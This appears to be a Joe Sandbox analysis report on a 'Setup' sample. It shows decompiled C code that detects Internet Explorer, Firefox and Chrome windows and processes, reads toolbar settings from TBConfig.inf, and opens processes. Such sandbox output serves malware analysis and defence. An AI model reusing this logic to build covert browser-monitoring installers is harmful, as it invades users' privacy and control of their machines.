                                                                                                                                                              				signed char _t204;
                                                                                                                                                              				void* _t207;
                                                                                                                                                              				struct HWND__* _t271;
                                                                                                                                                              				void* _t284;
                                                                                                                                                              				void* _t285;
                                                                                                                                                              				signed int _t286;
                                                                                                                                                              
                                                                                                                                                              				_t285 = __esi;
                                                                                                                                                              				_t284 = __edi;
                                                                                                                                                              				_t271 = __edx;
                                                                                                                                                              				_t207 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x51140b);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t141 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t142 = _t141 ^ _t286;
                                                                                                                                                              				_v28 = _t142;
                                                                                                                                                              				_push(_t142);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v1072 = __ecx;
                                                                                                                                                              				if( *0x5bc5fc == 0xfffffffe) {
                                                                                                                                                              					 *0x5bc5fc = 0xffffffff;
                                                                                                                                                              					E00433E30( &_v72);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413100( &_v596);
                                                                                                                                                              					_v636 = 0;
                                                                                                                                                              					E00417910(L"IEFrame", E00434050( &_v669));
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					_v1076 = E00433FC0( &_v668,  &_v636);
                                                                                                                                                              					_v1080 = _v1076;
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E00432780( &_v72, __eflags,  &_v680, _v1080);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E00443640();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v720 = 1;
                                                                                                                                                              					E00417910(L"MozillaWindowClass", E00434050( &_v753));
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					_v1084 = E00433FC0( &_v752,  &_v720);
                                                                                                                                                              					_v1088 = _v1084;
                                                                                                                                                              					_v8 = 4;
                                                                                                                                                              					E00432780( &_v72, __eflags,  &_v764, _v1088);
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					E00443640();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v804 = 1;
                                                                                                                                                              					E00417910(L"MozillaUIWindowClass", E00434050( &_v837));
                                                                                                                                                              					_v8 = 5;
                                                                                                                                                              					_v1092 = E00433FC0( &_v836,  &_v804);
                                                                                                                                                              					_v1096 = _v1092;
                                                                                                                                                              					_v8 = 6;
                                                                                                                                                              					E00432780( &_v72, __eflags,  &_v848, _v1096);
                                                                                                                                                              					_v8 = 5;
                                                                                                                                                              					E00443640();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v888 = 2;
                                                                                                                                                              					E00417910(L"Chrome_WidgetWin_0", E00434050( &_v921));
                                                                                                                                                              					_v8 = 7;
                                                                                                                                                              					_v1100 = E00433FC0( &_v920,  &_v888);
                                                                                                                                                              					_v1104 = _v1100;
                                                                                                                                                              					_v8 = 8;
                                                                                                                                                              					E00432780( &_v72, __eflags,  &_v932, _v1104);
                                                                                                                                                              					_v8 = 7;
                                                                                                                                                              					E00443640();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v972 = 2;
                                                                                                                                                              					E00417910(L"Chrome_WidgetWin_1", E00434050( &_v1005));
                                                                                                                                                              					_v8 = 9;
                                                                                                                                                              					_v1108 = E00433FC0( &_v1004,  &_v972);
                                                                                                                                                              					_v1112 = _v1108;
                                                                                                                                                              					_v8 = 0xa;
                                                                                                                                                              					E00432780( &_v72, __eflags,  &_v1016, _v1112);
                                                                                                                                                              					_v8 = 9;
                                                                                                                                                              					E00443640();
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v21 = 0;
                                                                                                                                                              					_v20 = 0;
                                                                                                                                                              					E004175C0(E00434050( &_v1017));
                                                                                                                                                              					_v8 = 0xb;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						__eflags = _v21 & 0x000000ff;
                                                                                                                                                              						if((_v21 & 0x000000ff) != 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v20;
                                                                                                                                                              						if(_v20 != 0) {
                                                                                                                                                              							_v20 = GetWindow(_v20, 2);
                                                                                                                                                              						} else {
                                                                                                                                                              							_v20 = GetTopWindow(0);
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v20;
                                                                                                                                                              						if(_v20 != 0) {
                                                                                                                                                              							_t195 = GetClassNameW(_v20,  &_v592, 0x104);
                                                                                                                                                              							__eflags = _t195;
                                                                                                                                                              							if(_t195 <= 0) {
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              							E00417910( &_v592, E00434050( &_v1053));
                                                                                                                                                              							_v8 = 0xc;
                                                                                                                                                              							_v596 =  *((intOrPtr*)(E00434AA0( &_v72, __eflags,  &_v1060,  &_v1052)));
                                                                                                                                                              							_v8 = 0xb;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              							_t204 = E00434020( &_v596, __eflags, E00407DE0( &_v72,  &_v1064));
                                                                                                                                                              							__eflags = _t204 & 0x000000ff;
                                                                                                                                                              							if((_t204 & 0x000000ff) == 0) {
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                              							if(_a4 != 0) {
                                                                                                                                                              								 *_a4 = _v20;
                                                                                                                                                              							}
                                                                                                                                                              							 *0x5bc5fc =  *(E0043D840( &_v596) + 0x20);
                                                                                                                                                              							_v21 = 1;
                                                                                                                                                              							break;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v21 = 1;
                                                                                                                                                              							L14:
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *0x5bc5fc - 0xffffffff;
                                                                                                                                                              					if( *0x5bc5fc == 0xffffffff) {
                                                                                                                                                              						_t191 = E00490170(_v1072, 0x30, 1);
                                                                                                                                                              						__eflags = _t191;
                                                                                                                                                              						if(_t191 != 0) {
                                                                                                                                                              							_t192 = E00491620(_v1072); // executed
                                                                                                                                                              							 *0x5bc5fc = _t192;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t271 =  *0x5bc5fc; // 0x0
                                                                                                                                                              					_v1068 = _t271;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004326D0();
                                                                                                                                                              					_t189 = _v1068;
                                                                                                                                                              					L19:
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return E0044F6C8(_t189, _t207, _v28 ^ _t286, _t271, _t284, _t285);
                                                                                                                                                              				}
                                                                                                                                                              				_t189 =  *0x5bc5fc; // 0x0
                                                                                                                                                              				goto L19;
                                                                                                                                                              			}
                                                                                                                                                              0x004920e8
                                                                                                                                                              0x004920f4
                                                                                                                                                              0x004920fa
                                                                                                                                                              0x0049210f
                                                                                                                                                              0x00492114
                                                                                                                                                              0x0049211e
                                                                                                                                                              0x00492123
                                                                                                                                                              0x0049212d
                                                                                                                                                              0x00492132
                                                                                                                                                              0x00492153
                                                                                                                                                              0x00492158
                                                                                                                                                              0x00492175
                                                                                                                                                              0x00492181
                                                                                                                                                              0x00492187
                                                                                                                                                              0x0049219c
                                                                                                                                                              0x004921a1
                                                                                                                                                              0x004921ab
                                                                                                                                                              0x004921b0
                                                                                                                                                              0x004921ba
                                                                                                                                                              0x004921bf
                                                                                                                                                              0x004921e0
                                                                                                                                                              0x004921e5
                                                                                                                                                              0x00492202
                                                                                                                                                              0x0049220e
                                                                                                                                                              0x00492214
                                                                                                                                                              0x00492229
                                                                                                                                                              0x0049222e
                                                                                                                                                              0x00492238
                                                                                                                                                              0x0049223d
                                                                                                                                                              0x00492247
                                                                                                                                                              0x0049224c
                                                                                                                                                              0x0049226d
                                                                                                                                                              0x00492272
                                                                                                                                                              0x0049228f
                                                                                                                                                              0x0049229b
                                                                                                                                                              0x004922a1
                                                                                                                                                              0x004922b6
                                                                                                                                                              0x004922bb
                                                                                                                                                              0x004922c5
                                                                                                                                                              0x004922ca
                                                                                                                                                              0x004922d4
                                                                                                                                                              0x004922d9
                                                                                                                                                              0x004922dd
                                                                                                                                                              0x004922f3
                                                                                                                                                              0x004922f8
                                                                                                                                                              0x004922fc
                                                                                                                                                              0x00492300
                                                                                                                                                              0x00492302
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492308
                                                                                                                                                              0x0049230c
                                                                                                                                                              0x00492327
                                                                                                                                                              0x0049230e
                                                                                                                                                              0x00492316
                                                                                                                                                              0x00492316
                                                                                                                                                              0x0049232a
                                                                                                                                                              0x0049232e
                                                                                                                                                              0x00492349
                                                                                                                                                              0x0049234f
                                                                                                                                                              0x00492351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492370
                                                                                                                                                              0x00492375
                                                                                                                                                              0x00492391
                                                                                                                                                              0x00492397
                                                                                                                                                              0x004923a1
                                                                                                                                                              0x004923bc
                                                                                                                                                              0x004923c4
                                                                                                                                                              0x004923c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004923c8
                                                                                                                                                              0x004923cc
                                                                                                                                                              0x004923d4
                                                                                                                                                              0x004923d4
                                                                                                                                                              0x004923e4
                                                                                                                                                              0x004923ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492330
                                                                                                                                                              0x00492330
                                                                                                                                                              0x004923f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004923f0
                                                                                                                                                              0x0049232e
                                                                                                                                                              0x004923f5
                                                                                                                                                              0x004923fc
                                                                                                                                                              0x00492408
                                                                                                                                                              0x0049240d
                                                                                                                                                              0x0049240f
                                                                                                                                                              0x00492417
                                                                                                                                                              0x0049241c
                                                                                                                                                              0x0049241c
                                                                                                                                                              0x0049240f
                                                                                                                                                              0x00492421
                                                                                                                                                              0x00492427
                                                                                                                                                              0x0049242d
                                                                                                                                                              0x00492434
                                                                                                                                                              0x00492439
                                                                                                                                                              0x00492443
                                                                                                                                                              0x00492448
                                                                                                                                                              0x0049244e
                                                                                                                                                              0x00492451
                                                                                                                                                              0x00492466
                                                                                                                                                              0x00492466
                                                                                                                                                              0x00491fea
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Chrome_WidgetWin_0$Chrome_WidgetWin_1$IEFrame$MozillaUIWindowClass$MozillaWindowClass
                                                                                                                                                              • API String ID: 0-1325454669
                                                                                                                                                              • Opcode ID: 47271f5d255105937451c300bb579388e601e760e0d38bb1269346cfc4cb8fda
                                                                                                                                                              • Instruction ID: 068bcbba74f8fad60f21ca895231b3698f7e5d6b81cf0523b8161fadf405f3c8
                                                                                                                                                              • Opcode Fuzzy Hash: 47271f5d255105937451c300bb579388e601e760e0d38bb1269346cfc4cb8fda
                                                                                                                                                              • Instruction Fuzzy Hash: 98D17BB0904258DBDB25DB64CD95BEEBB78AF14304F1041EEE10967291DB782F88CF99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 802 4908a0-4908de GetTickCount 803 4908e0-4908f2 802->803 804 490902-490940 call 434050 call 4175c0 call 434050 call 4175c0 802->804 803->804 805 4908f4-4908fd 803->805 817 49094d-49095d call 4903a0 804->817 818 490942-490948 call 405140 804->818 807 490ab3-490acb call 44f6c8 805->807 821 490962-490967 817->821 818->817 822 490a89-490aad call 4176e0 * 2 821->822 823 49096d-490971 821->823 822->807 824 49097a-4909b3 call 416a30 call 45508b call 452266 823->824 825 490973 823->825 824->822 836 4909b9-4909de call 455a52 call 4522f9 824->836 825->824 841 4909e9-4909ff call 4522f9 836->841 842 4909e0-4909e7 836->842 848 490a0a-490a20 call 4522f9 841->848 849 490a01-490a08 841->849 843 490a29-490a2d 842->843 846 490a2f-490a6f call 434050 call 417910 call 4181d0 call 4176e0 843->846 847 490a71-490a86 843->847 846->822 847->822 848->843 855 490a22 848->855 849->843 855->843
                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E004908A0(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				char _v84;
                                                                                                                                                              				char _v88;
                                                                                                                                                              				long _v92;
                                                                                                                                                              				char _v608;
                                                                                                                                                              				char _v1120;
                                                                                                                                                              				char _v1121;
                                                                                                                                                              				char _v1122;
                                                                                                                                                              				char _v1156;
                                                                                                                                                              				char _v1157;
                                                                                                                                                              				intOrPtr _v1164;
                                                                                                                                                              				signed int _v1168;
                                                                                                                                                              				signed int _t61;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				signed char _t70;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				signed int _t78;
                                                                                                                                                              				signed int _t81;
                                                                                                                                                              				signed int _t82;
                                                                                                                                                              				signed int _t84;
                                                                                                                                                              				void* _t93;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t124;
                                                                                                                                                              				signed int _t125;
                                                                                                                                                              
                                                                                                                                                              				_t124 = __esi;
                                                                                                                                                              				_t123 = __edi;
                                                                                                                                                              				_t93 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50ab4d);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t61 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t62 = _t61 ^ _t125;
                                                                                                                                                              				_v20 = _t62;
                                                                                                                                                              				_push(_t62);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v1168 = __ecx;
                                                                                                                                                              				_v92 = GetTickCount();
                                                                                                                                                              				if(_a4 != 0 || _v92 -  *((intOrPtr*)(_v1168 + 0x20)) >= 0xbb8) {
                                                                                                                                                              					_v88 = 0xffffffff;
                                                                                                                                                              					E004175C0(E00434050( &_v1121));
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004175C0(E00434050( &_v1122));
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					__eflags = _a4;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = _a4 + 4;
                                                                                                                                                              						E00405140(_a4 + 4);
                                                                                                                                                              					}
                                                                                                                                                              					_t70 = E004903A0(_t93, _v1168, _t123, _t124, __eflags,  &_v84,  &_v52, 0); // executed
                                                                                                                                                              					_t121 = _t70 & 0x000000ff;
                                                                                                                                                              					__eflags = _t70 & 0x000000ff;
                                                                                                                                                              					if((_t70 & 0x000000ff) != 0) {
                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                              							_v88 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						E0045508B(E00416A30( &_v80), 0, 0,  &_v608,  &_v1120);
                                                                                                                                                              						_t121 =  &_v1120;
                                                                                                                                                              						_t78 = E00452266( &_v1120,  &_v1120, L".exe");
                                                                                                                                                              						__eflags = _t78;
                                                                                                                                                              						if(_t78 == 0) {
                                                                                                                                                              							E00455A52( &_v1120, _t123,  &_v608);
                                                                                                                                                              							_t81 = E004522F9( &_v608, L"iexplore");
                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                              							if(_t81 != 0) {
                                                                                                                                                              								_t82 = E004522F9( &_v608, L"firefox");
                                                                                                                                                              								__eflags = _t82;
                                                                                                                                                              								if(_t82 != 0) {
                                                                                                                                                              									_t84 = E004522F9( &_v608, L"chrome");
                                                                                                                                                              									__eflags = _t84;
                                                                                                                                                              									if(_t84 == 0) {
                                                                                                                                                              										_v88 = 2;
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_v88 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_v88 = 0;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                              							if(_a4 == 0) {
                                                                                                                                                              								 *((intOrPtr*)(_v1168 + 0x24)) = _v88;
                                                                                                                                                              								_t121 = _v1168;
                                                                                                                                                              								 *((intOrPtr*)(_v1168 + 0x20)) = _v92;
                                                                                                                                                              							} else {
                                                                                                                                                              								E00417910( &_v608, E00434050( &_v1157));
                                                                                                                                                              								_v8 = 2;
                                                                                                                                                              								_t121 =  &_v1156;
                                                                                                                                                              								E004181D0(_a4,  &_v1156);
                                                                                                                                                              								_v8 = 1;
                                                                                                                                                              								E004176E0();
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v1164 = _v88;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_t73 = _v1164;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t121 = _v1168;
                                                                                                                                                              					_t73 =  *((intOrPtr*)(_v1168 + 0x24));
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t73, _t93, _v20 ^ _t125, _t121, _t123, _t124);
                                                                                                                                                              			}
































                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick__wcsicoll__wcslwr__wsplitpath
                                                                                                                                                              • String ID: .exe$chrome$firefox$iexplore
                                                                                                                                                              • API String ID: 2438297081-2896129864
                                                                                                                                                              • Opcode ID: 109f32217dcdc2aed6e4a36be8767c9548daeb00cefb0319db9fb4e4b38703da
                                                                                                                                                              • Instruction ID: 37f3a4782168a7ba4b219689af37ff2fec423a0874b7ec890f9b0939c7c311b7
                                                                                                                                                              • Opcode Fuzzy Hash: 109f32217dcdc2aed6e4a36be8767c9548daeb00cefb0319db9fb4e4b38703da
                                                                                                                                                              • Instruction Fuzzy Hash: 265173B19102189FDF14DF95CD85BEEBBB4BF14304F1085AEE50667281EB786A48CF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E004D22E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v150;
                                                                                                                                                              				short _v152;
                                                                                                                                                              				char _v180;
                                                                                                                                                              				void* _v184;
                                                                                                                                                              				char _v212;
                                                                                                                                                              				char _v216;
                                                                                                                                                              				char _v220;
                                                                                                                                                              				char _v221;
                                                                                                                                                              				char _v252;
                                                                                                                                                              				char _v284;
                                                                                                                                                              				char _v285;
                                                                                                                                                              				intOrPtr _v292;
                                                                                                                                                              				char _v296;
                                                                                                                                                              				intOrPtr _v300;
                                                                                                                                                              				intOrPtr _v304;
                                                                                                                                                              				signed int _t52;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				long _t65;
                                                                                                                                                              				signed char _t66;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				void* _t83;
                                                                                                                                                              				void* _t116;
                                                                                                                                                              				void* _t117;
                                                                                                                                                              				signed int _t118;
                                                                                                                                                              
                                                                                                                                                              				_t117 = __esi;
                                                                                                                                                              				_t116 = __edi;
                                                                                                                                                              				_t83 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50c1e1);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t52 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t53 = _t52 ^ _t118;
                                                                                                                                                              				_v20 = _t53;
                                                                                                                                                              				_push(_t53);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v220 = 4;
                                                                                                                                                              				E004175C0(E00434050( &_v221));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(0x5bdf4c == 0) {
                                                                                                                                                              					_v296 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v296 = 0x5bdf50;
                                                                                                                                                              				}
                                                                                                                                                              				_v300 = E004098D0( &_v252, _v296, L"TBConfig.inf");
                                                                                                                                                              				_v304 = _v300;
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				E00409810(_v304);
                                                                                                                                                              				_v8 = 3;
                                                                                                                                                              				E004178C0( &_v252);
                                                                                                                                                              				_v152 = 0;
                                                                                                                                                              				E00451D90(_t116,  &_v150, 0, 0x7e);
                                                                                                                                                              				_t65 = GetPrivateProfileStringW(L"toolbar", L"name", 0x534670,  &_v152, 0x40, E00416A30( &_v180)); // executed
                                                                                                                                                              				if(_t65 != 0) {
                                                                                                                                                              					E00417910( &_v152, E00434050( &_v285));
                                                                                                                                                              					_v8 = 4;
                                                                                                                                                              					E004181D0( &_v216,  &_v284);
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              				}
                                                                                                                                                              				_t66 = E00416630( &_v212);
                                                                                                                                                              				_t126 = _t66 & 0x000000ff;
                                                                                                                                                              				if((_t66 & 0x000000ff) != 0) {
                                                                                                                                                              					E004160E0(E004D1B70( &_v212, 0xe),  &_v216, 1);
                                                                                                                                                              				}
                                                                                                                                                              				if(E00425A20(_t83,  &_v212, _t116, _t117, _t126, 0, 4, L"mntr") != 0) {
                                                                                                                                                              					__eflags = E00425A20(_t83,  &_v212, _t116, _t117, __eflags, 0, 4, L"bstl");
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						_t69 = E00425A20(_t83,  &_v212, _t116, _t117, __eflags, 0, 4, L"cndt");
                                                                                                                                                              						__eflags = _t69;
                                                                                                                                                              						if(_t69 == 0) {
                                                                                                                                                              							_v220 = 3;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_v220 = 2;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_v220 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					E004181D0(_a4,  &_v216);
                                                                                                                                                              				}
                                                                                                                                                              				_v292 = _v220;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v292, _t83, _v20 ^ _t118, _v220, _t116, _t117);
                                                                                                                                                              			}































                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString_memset
                                                                                                                                                              • String ID: TBConfig.inf$bstl$cndt$mntr$name$toolbar
                                                                                                                                                              • API String ID: 52020338-616969326
                                                                                                                                                              • Opcode ID: 160960445c8143f5cb87fbff7eca0841f38b85c355043c3659fd8628d174bc84
                                                                                                                                                              • Instruction ID: 179ce378cb9408fc47fb286d9aad18257402b0420dcce1f1aa30694a285b3d12
                                                                                                                                                              • Opcode Fuzzy Hash: 160960445c8143f5cb87fbff7eca0841f38b85c355043c3659fd8628d174bc84
                                                                                                                                                              • Instruction Fuzzy Hash: 4C513170A002189ADB24DF65DD52BEEB774AF54304F0041DBE609B62C1EF786B88CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E00496160(void* __ebx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v542;
                                                                                                                                                              				char _v544;
                                                                                                                                                              				int _v548;
                                                                                                                                                              				int _v552;
                                                                                                                                                              				char _v584;
                                                                                                                                                              				char _v585;
                                                                                                                                                              				char _v620;
                                                                                                                                                              				char _v621;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				short _t42;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				signed int _t87;
                                                                                                                                                              
                                                                                                                                                              				_t86 = __esi;
                                                                                                                                                              				_t85 = __edi;
                                                                                                                                                              				_t62 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5085e8);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t39 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t40 = _t39 ^ _t87;
                                                                                                                                                              				_v24 = _t40;
                                                                                                                                                              				_push(_t40);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_t42 =  *0x52a818; // 0x0
                                                                                                                                                              				_v544 = _t42;
                                                                                                                                                              				E00451D90(__edi,  &_v542, 0, 0x206);
                                                                                                                                                              				E00417910(L"N/A", E00434050( &_v585));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t82 =  &_v584;
                                                                                                                                                              				E004181D0(_a8,  &_v584);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v20 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                              				if(_v20 == 0) {
                                                                                                                                                              					_t50 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v548 = 0;
                                                                                                                                                              					_v552 = 0;
                                                                                                                                                              					_push( &_v552);
                                                                                                                                                              					_push(4);
                                                                                                                                                              					_push( &_v548);
                                                                                                                                                              					_t52 = _v20;
                                                                                                                                                              					_push(_t52); // executed
                                                                                                                                                              					L0046BBE6(); // executed
                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                              						_push(0x104);
                                                                                                                                                              						_push( &_v544);
                                                                                                                                                              						_t82 = _v20;
